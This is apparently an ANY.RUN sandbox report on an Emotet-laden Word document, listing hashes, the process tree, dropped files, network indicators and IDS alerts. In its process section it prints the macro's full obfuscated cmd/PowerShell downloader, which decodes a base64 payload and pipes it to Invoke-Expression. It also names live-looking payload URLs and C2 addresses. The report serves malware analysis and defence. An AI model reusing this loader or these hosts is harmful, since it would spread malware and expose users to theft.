analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Nuevo-contrato.doc

Full analysis: https://app.any.run/tasks/f9ad10b3-e2fe-46a5-b91f-5e08a5bd0524
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 15:32:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Juliana-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:48:00 2018, Last Saved Time/Date: Wed Nov 7 16:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

8C31C4839471E1EE013296AF2380EC89

SHA1:

CF72C6D17E22D6B516229A57F9294B22333DCD67

SHA256:

907054EC3CCAB5AEFC7AB082F70746B8861099F32F5622F549D35AE27B1FF2BF

SSDEEP:

768:V7FLVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OkDOsDPjEed72g:VZLocn1kp59gxBK85fBt+a9LdS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 509.exe (PID: 2372)
      • 509.exe (PID: 648)
      • lpiograd.exe (PID: 1392)
      • lpiograd.exe (PID: 3988)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1140)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1840)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1840)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 3988)
    • EMOTET was detected

      • lpiograd.exe (PID: 3988)
    • Emotet process was detected

      • lpiograd.exe (PID: 1392)
    • Connects to CnC server

      • lpiograd.exe (PID: 3988)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1140)
    • Application launched itself

      • 509.exe (PID: 2372)
    • Executes PowerShell scripts

      • CMD.exe (PID: 2172)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1140)
      • 509.exe (PID: 648)
    • Starts itself from another location

      • 509.exe (PID: 648)
    • Connects to unusual port

      • lpiograd.exe (PID: 3988)
    • Connects to SMTP port

      • lpiograd.exe (PID: 3988)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1840)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:07 16:48:00
CreateDate: 2018:11:07 16:48:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Juliana-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 509.exe no specs 509.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
1840"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Nuevo-contrato.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2172CMD cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^| %{ $_.rEadTOENd( ) })^|inVOKe-EXpreSSioN&&POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1140POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2372"C:\Users\admin\AppData\Local\Temp\509.exe" C:\Users\admin\AppData\Local\Temp\509.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
648"C:\Users\admin\AppData\Local\Temp\509.exe"C:\Users\admin\AppData\Local\Temp\509.exe
509.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
1392"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
509.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
3988"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Total events
1 675
Read events
1 260
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9CE7.tmp.cvr
MD5:
SHA256:
1140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JT4WB0EQKHA081JZTI5F.temp
MD5:
SHA256:
1840WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:85283E8C73AC10A255BBE4286BF1BDB3
SHA256:0020F0707504300A48B9B083CDF48B2783CA33CFEDF40EFB79F861241E0A6BF5
1140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da90d.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1140powershell.exeC:\Users\admin\AppData\Local\Temp\509.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
1840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$evo-contrato.docpgc
MD5:8B6C5369D6EEDE3E857B276C3C48E76E
SHA256:4C06AA0C9D6EC02B435E955A4BFAAAB6D84D490EA1EDEB9D9BAD594AAECD4C64
648509.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
1140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
61
DNS requests
62
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3988
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
714 Kb
malicious
1140
powershell.exe
GET
200
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC/
US
executable
792 Kb
malicious
3988
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
1140
powershell.exe
GET
301
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC
US
html
246 b
malicious
3988
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/
US
pgc
52.9 Kb
malicious
3988
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/whoami.php
US
text
14 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3988
lpiograd.exe
66.96.144.190:587
pop.grupopinulito.com
The Endurance International Group, Inc.
US
malicious
3988
lpiograd.exe
173.203.187.10:25
pop.emailsrvr.com
Rackspace Ltd.
US
malicious
1140
powershell.exe
132.148.249.54:80
www.amenterprise.info
GoDaddy.com, LLC
US
suspicious
3988
lpiograd.exe
50.22.79.68:587
smtp.grupohycsa.com.mx
SoftLayer Technologies Inc.
US
unknown
3988
lpiograd.exe
184.171.250.250:587
mail.europcar.com.mx
HostDime.com, Inc.
US
unknown
3988
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
3988
lpiograd.exe
173.203.187.10:587
pop.emailsrvr.com
Rackspace Ltd.
US
malicious
3988
lpiograd.exe
46.30.211.158:587
mail.one.com
One.com A/S
DK
unknown
3988
lpiograd.exe
146.20.161.10:465
secure.emailsrvr.com
Rackspace Ltd.
US
malicious
3988
lpiograd.exe
47.157.181.81:443
Frontier Communications of America, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
www.amenterprise.info
  • 132.148.249.54
malicious
pop.emailsrvr.com
  • 173.203.187.10
shared
secure.emailsrvr.com
  • 173.203.187.10
  • 146.20.161.10
shared
mail.swbmail.de
unknown
pop.grupopinulito.com
  • 66.96.144.190
malicious
mail.europcar.com.mx
  • 184.171.250.250
unknown
smtp.grupohycsa.com.mx
  • 50.22.79.68
unknown
mail.one.com
  • 46.30.211.158
shared
mail.palmar.com.ec
  • 201.218.35.22
unknown
mail.bachknives.com
  • 207.204.50.10
unknown

Threats

PID
Process
Class
Message
1140
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1140
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1140
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1140
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3988
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3988
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3 ETPRO signatures available at the full report
No debug info